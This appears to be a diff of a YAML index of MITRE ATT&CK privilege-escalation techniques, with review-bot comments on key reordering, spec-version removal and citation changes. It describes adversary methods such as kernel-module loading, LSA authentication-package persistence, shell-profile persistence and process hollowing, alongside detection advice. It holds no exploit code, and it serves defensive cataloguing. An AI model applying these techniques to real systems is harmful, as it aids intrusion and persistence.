- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: MacOS - Load Kernel Module via kextload and kmutil
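Review bot: almost all of this hunk (143 old lines against 141 new) is the same T1547.006 content re-emitted in a different key order (description, detection, kill_chain_phases, platforms, data sources and every reference's url line all move), which hides the handful of real changes: modified goes from 2022-05-11 to 2024-09-12, x_mitre_attack_spec_version goes from 2.1.0 to 3.2.0, spec_version: '2.1' is removed, and the iDefense Rootkit Overview reference gets an https URL and a September 12, 2024 retrieval date. Have the generator emit keys in a fixed order (or sort them) so a regeneration diff shows only semantic changes and can actually be reviewed.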
@@ -23365,7 +23679,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -23391,12 +23705,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
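Review bot: x_mitre_attack_spec_version: 2.1.0 is removed from the KernelCallbackTable technique together with spec_version, and unlike the other techniques in this patch no replacement value appears in this hunk. If the field was re-added at 3.2.0 earlier in the object, outside the hunk, fine; otherwise the object now has no attack spec version at all, which is inconsistent with the rest of the file and should be checked before merging.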
@@ -23474,9 +23786,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -23543,7 +23854,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -23617,11 +23927,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -23638,7 +23947,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -23648,7 +23956,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -23657,19 +23965,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -23717,11 +24023,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -23789,23 +24096,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
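Review bot: the Leitch Hollowing reference moves from the author's site (autosectools.com) to a copy hosted under new.dc414.org/wp-content/uploads, with the retrieval date updated to September 12, 2024. A third-party mirror is a weaker citation than the original; confirm this is the value now carried by upstream ATT&CK rather than a hand edit, and if it is upstream's value leave it as is, since this index should mirror ATT&CK's references verbatim.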
@@ -23868,11 +24174,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
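Review bot: `spec_version: '2.1'` is dropped from T1068 here and from every other technique object in this patch, while `x_mitre_attack_spec_version` is kept. `spec_version` is a required common property on STIX 2.1 domain objects, so if anything downstream validates these entries as STIX (rather than treating them as an opaque index), the removal needs a matching change there; otherwise it is harmless churn, but the generator change that caused it should be called out in the commit message.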
@@ -23925,8 +24230,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -23974,78 +24279,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
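Review bot: the 78-line removal in this hunk is a key reorder, not a deletion: the platforms, domains, contributors, marking refs, `id`, `type`, `created`, `created_by_ref` and the full `external_references` list for T1546.004 are removed here and re-added lower in the same object by the `+ x_mitre_contributors`, `+ x_mitre_domains`/`+ x_mitre_platforms` and `+ external_references` hunks that follow, so the only substantive changes are the `modified` date and the later citation edits. Emitting keys in a stable order from the generator would keep diffs like this reviewable and would stop every field appearing twice in the patch.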
@@ -24093,6 +24331,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -24103,9 +24345,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -24114,8 +24360,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
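Review bot: the re-added `external_references` list is re-sorted (mitre-attack first, then by author surname) and the `bencane blog bashrc` entry now points at a web.archive.org snapshot with its retrieval date updated to September 25, 2024 while its `source_name` is unchanged, so the `(Citation: bencane blog bashrc)` key still resolves; that is the right way to replace a dead link. The new `revoked: false` and `x_mitre_deprecated: false` flags are fine, but note that `x_mitre_modified_by_ref` was removed in the previous hunk and only reappears at the end of this one, so anyone reading the hunks in isolation will think the field was dropped; a one-line mention of the key reorder in the PR description would avoid that.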
@@ -24203,7 +24508,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -24228,13 +24533,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -24314,7 +24617,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -24350,7 +24652,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -24373,12 +24675,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -24456,12 +24757,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -24522,7 +24822,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -24566,7 +24865,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -24588,7 +24887,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -24821,7 +25119,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -24844,7 +25141,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -24874,12 +25171,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -24964,7 +25259,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -25029,7 +25323,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -25104,7 +25397,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -25132,7 +25425,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -25279,7 +25571,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -25322,12 +25614,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -25344,7 +25634,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
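Review bot: the T1546.016 contributor entry changes from `Alexander Rodchenko` to `Rodchenko Aleksandr` (surname first, different transliteration) while the technique's `modified` date only moves forward by three weeks; if this mirrors an upstream ATT&CK correction it is fine, but please confirm it against the upstream object rather than a generator-side name normalisation, since contributor strings are matched verbatim by anyone deduplicating credits across techniques.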
@@ -25403,7 +25693,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
